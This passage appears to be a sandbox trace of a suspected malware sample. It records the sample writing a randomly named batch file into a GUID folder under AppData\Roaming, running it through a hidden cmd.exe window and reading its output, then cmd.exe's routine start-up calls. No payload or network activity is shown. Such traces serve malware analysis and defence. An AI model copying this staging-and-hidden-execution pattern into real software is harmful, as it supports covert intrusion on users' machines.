halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0031.739] GetFileType (hFile=0x254) returned 0x1 [0031.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xa33f638) returned 1 [0031.739] GetFileType (hFile=0x254) returned 0x1 [0031.740] WriteFile (in: hFile=0x254, lpBuffer=0x20e1ef0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xa33f700, lpOverlapped=0x0 | out: lpBuffer=0x20e1ef0*, lpNumberOfBytesWritten=0xa33f700*=0x1000, lpOverlapped=0x0) returned 1 [0031.741] WriteFile (in: hFile=0x254, lpBuffer=0x20e1ef0*, nNumberOfBytesToWrite=0x8c1, lpNumberOfBytesWritten=0xa33f6d4, lpOverlapped=0x0 | out: lpBuffer=0x20e1ef0*, lpNumberOfBytesWritten=0xa33f6d4*=0x8c1, lpOverlapped=0x0) returned 1 [0031.741] CloseHandle (hObject=0x254) returned 1 [0031.981] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.983] CreatePipe (in: hReadPipe=0xa33f648, hWritePipe=0xa33f644, lpPipeAttributes=0xa33f5c8, nSize=0x0 | out: hReadPipe=0xa33f648*=0x260, hWritePipe=0xa33f644*=0x264) returned 1 [0031.984] GetCurrentProcess () returned 0xffffffff [0031.984] GetCurrentProcess () returned 0xffffffff [0031.984] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa33f64c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xa33f64c*=0x268) returned 1 [0031.984] CloseHandle (hObject=0x260) returned 1 [0031.984] CreatePipe (in: hReadPipe=0xa33f648, hWritePipe=0xa33f644, lpPipeAttributes=0xa33f5c8, nSize=0x0 | out: hReadPipe=0xa33f648*=0x260, hWritePipe=0xa33f644*=0x26c) returned 1 [0031.984] GetCurrentProcess () returned 0xffffffff [0031.984] GetCurrentProcess () returned 0xffffffff [0031.985] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa33f64c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xa33f64c*=0x270) returned 1 [0031.985] CloseHandle (hObject=0x260) returned 1 [0031.985] CoTaskMemAlloc (cb=0x20e) returned 0x4f3a58 [0031.985] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4f3a58 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0031.985] CoTaskMemFree (pv=0x4f3a58) [0031.986] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0xa33f4ec*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c), lpProcessInformation=0x20e3640 | out: lpCommandLine="\"cmd.exe\" /c \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"", lpProcessInformation=0x20e3640*(hProcess=0x274, hThread=0x260, dwProcessId=0x908, dwThreadId=0x90c)) returned 1 [0032.159] CloseHandle (hObject=0x264) returned 1 [0032.159] CloseHandle (hObject=0x26c) returned 1 [0032.160] GetFileType (hFile=0x268) returned 0x3 [0032.195] GetFileType (hFile=0x270) returned 0x3 [0032.196] CloseHandle (hObject=0x260) returned 1 [0032.196] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0032.526] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0034.627] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0034.627] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0034.821] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.194] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.194] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.283] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.320] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.321] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.438] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.473] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.473] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.579] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.615] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.616] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.709] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.745] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.745] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.842] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0035.888] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0035.889] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0035.986] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0036.021] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0036.021] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0036.112] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0036.147] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0036.147] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0036.239] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0036.273] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0036.274] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0036.485] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0036.524] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0036.524] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0036.632] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x7, lpOverlapped=0x0) returned 1 [0036.668] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x80, lpOverlapped=0x0) returned 1 [0036.668] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x77, lpOverlapped=0x0) returned 1 [0036.802] ReadFile (in: hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0 | out: lpBuffer=0x20e4050*, lpNumberOfBytesRead=0xa33f70c*=0x32, lpOverlapped=0x0) returned 1 [0036.839] ReadFile (hFile=0x268, lpBuffer=0x20e4050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xa33f70c, lpOverlapped=0x0) Thread: id = 27 os_tid = 0x970 Thread: id = 248 os_tid = 0xab0 Thread: id = 249 os_tid = 0xab4 Thread: id = 251 os_tid = 0xb80 [0150.589] CoGetContextToken (in: pToken=0x495f44c | out: pToken=0x495f44c) returned 0x0 [0150.590] CObjectContext::QueryInterface () returned 0x0 [0150.590] CObjectContext::GetCurrentThreadType () returned 0x0 [0150.590] Release () returned 0x0 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4fb01000" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8dc" cmd_line = "\"cmd.exe\" /c \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0x90c [0032.249] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3bfa8c | out: lpSystemTimeAsFileTime=0x3bfa8c*(dwLowDateTime=0xde73b160, dwHighDateTime=0x1d57a86)) [0032.249] GetCurrentProcessId () returned 0x908 [0032.249] GetCurrentThreadId () returned 0x90c [0032.249] GetTickCount () returned 0x114386f [0032.249] QueryPerformanceCounter (in: lpPerformanceCount=0x3bfa84 | out: lpPerformanceCount=0x3bfa84*=15253373410) returned 1 [0032.250] GetModuleHandleA (lpModuleName=0x0) returned 0x4a960000 [0032.250] __set_app_type (_Type=0x1) [0032.250] __p__fmode () returned 0x74eb31f4 [0032.251] __p__commode () returned 0x74eb31fc [0032.251] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9821a6) returned 0x0 [0032.251] __getmainargs (in: _Argc=0x4a984238, _Argv=0x4a984240, _Env=0x4a98423c, _DoWildCard=0, _StartInfo=0x4a984140 | out: _Argc=0x4a984238, _Argv=0x4a984240, _Env=0x4a98423c) returned 0 [0032.251] GetCurrentThreadId () returned 0x90c [0032.251] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90c) returned 0x60 [0032.251] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0032.251] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0032.252] SetThreadUILanguage (LangId=0x0) returned 0x409 [0032.252] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0032.252] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3bfa1c | out: phkResult=0x3bfa1c*=0x0) returned 0x2 [0032.252] VirtualQuery (in: lpAddress=0x3bfa53, lpBuffer=0x3bf9ec, dwLength=0x1c | out: lpBuffer=0x3bf9ec*(BaseAddress=0x3bf000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0032.252] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x3bf9ec, dwLength=0x1c | out: lpBuffer=0x3bf9ec*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0032.252] VirtualQuery (in: lpAddress=0x2c1000, lpBuffer=0x3bf9ec, dwLength=0x1c | out: lpBuffer=0x3bf9ec*(BaseAddress=0x2c1000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0032.252] VirtualQuery (in: lpAddress=0x2c3000, lpBuffer=0x3bf9ec, dwLength=0x1c | out: lpBuffer=0x3bf9ec*(BaseAddress=0x2c3000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0032.252] VirtualQuery (in: lpAddress=0x3c0000, lpBuffer=0x3bf9ec, dwLength=0x1c | out: lpBuffer=0x3bf9ec*(BaseAddress=0x3c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0032.252] GetConsoleOutputCP () returned 0x1b5 [0032.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0032.253] SetConsoleCtrlHandler (HandlerRoutine=0x4a97e72a, Add=1) returned 1 [0032.253] _get_osfhandle (_FileHandle=1) returned 0x264 [0032.253] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0032.253] _get_osfhandle (_FileHandle=1) returned 0x264 [0032.253] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0032.253] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0032.253] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0032.255] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0032.255] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0032.255] GetEnvironmentStringsW () returned 0x3f4068* [0032.255] GetProcessHeap () returned 0x3e0000 [0032.255] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xaca) returned 0x3f4b40 [0032.256] FreeEnvironmentStringsW (penv=0x3f4068) returned 1 [0032.256] GetProcessHeap () returned 0x3e0000 [0032.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4) returned 0x3f0d20 [0032.256] GetEnvironmentStringsW () returned 0x3f4068* [0032.256] GetProcessHeap () returned 0x3e0000 [0032.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xaca) returned 0x3f5618 [0032.256] FreeEnvironmentStringsW (penv=0x3f4068) returned 1 [0032.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3be98c | out: phkResult=0x3be98c*=0x68) returned 0x0 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x0, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x1, lpcbData=0x3be990*=0x4) returned 0x0 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x1, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x0, lpcbData=0x3be990*=0x4) returned 0x0 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x40, lpcbData=0x3be990*=0x4) returned 0x0 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x40, lpcbData=0x3be990*=0x4) returned 0x0 [0032.256] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x40, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.256] RegCloseKey (hKey=0x68) returned 0x0 [0032.256] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3be98c | out: phkResult=0x3be98c*=0x68) returned 0x0 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x40, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x1, lpcbData=0x3be990*=0x4) returned 0x0 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x1, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x0, lpcbData=0x3be990*=0x4) returned 0x0 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x9, lpcbData=0x3be990*=0x4) returned 0x0 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x4, lpData=0x3be998*=0x9, lpcbData=0x3be990*=0x4) returned 0x0 [0032.257] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3be994, lpData=0x3be998, lpcbData=0x3be990*=0x1000 | out: lpType=0x3be994*=0x0, lpData=0x3be998*=0x9, lpcbData=0x3be990*=0x1000) returned 0x2 [0032.257] RegCloseKey (hKey=0x68) returned 0x0 [0032.257] time (in: timer=0x0 | out: timer=0x0) returned 0x5d96f737 [0032.257] srand (_Seed=0x5d96f737) [0032.257] GetCommandLineW () returned="\"cmd.exe\" /c \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"" [0032.257] GetCommandLineW () returned="\"cmd.exe\" /c \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"" [0032.258] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a985260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.258] GetProcessHeap () returned 0x3e0000 [0032.258] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f4068 [0032.258] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f4070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0032.259] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.259] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.259] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.259] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0032.259] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0032.259] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0032.259] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0032.259] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0032.259] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0032.259] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0032.259] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0032.259] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0032.259] GetProcessHeap () returned 0x3e0000 [0032.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b40 | out: hHeap=0x3e0000) returned 